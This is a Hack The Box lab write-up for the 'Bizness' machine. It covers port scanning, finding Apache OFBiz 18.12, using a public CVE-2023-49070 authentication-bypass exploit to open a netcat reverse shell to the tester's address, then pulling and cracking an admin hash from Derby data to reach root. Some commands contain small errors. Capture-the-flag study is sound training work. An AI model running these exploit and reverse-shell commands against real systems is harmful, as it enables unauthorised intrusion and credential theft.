Post

HTB - Bizness

Box Info

NameBizness
Release Date06 Jan, 2024
OSLinux
Rated DifficultyEasy

Enumeration

1
2
nmap -p- --min-rate 5000 -n -sS -vvv -Pn 10.10.11.252 -oG allports
nmap -sCV -p 22,80,443,40117 10.10.11.252 -oN targeted

Image

Add the domain to /etc/hosts

1
echo "10.10.11.252 bizness.htb | sudo tee -a /etc/hosts/

Image

Brute Force Directory

1
dirsearch -u http://bizness.htb/

Image

OFBiz

The website is using a technology called OFBiz with version 18.12, the current version is out date.

Image

Apache OFBiz 18.12 CVE-2023-49070

Image

Apache-OFBiz-Authentication-Bypass

We used the exploit to authenticate ourselves.

1
python3 exploit.py --url  https://bizness.htb:443 --cmd 'nc -e /bin/bash 10.10.14.16 7777'
1
nc -lvnp 7777

Image

Enumeration linux

Before launching this search, I found a location where the OFBiz folder was located and performed searches that contain admin. I searched recursively using grep, using options like -Rail, and to specify the word I used -e.

1
grep -Rail -e 'admin$' /top/ofbiz/runtime/data/derby/ofbiz/seg0

Image

We came across a lot of data, so we have to go through each one by one.

We find a user and the hash

Image

Cracking Hash

We will use the Go hash matcher script to crack the password.

Go-Hash-Matcher

Image

Once we have the password, we log in at the root

Image

This post is licensed under CC BY 4.0 by the author.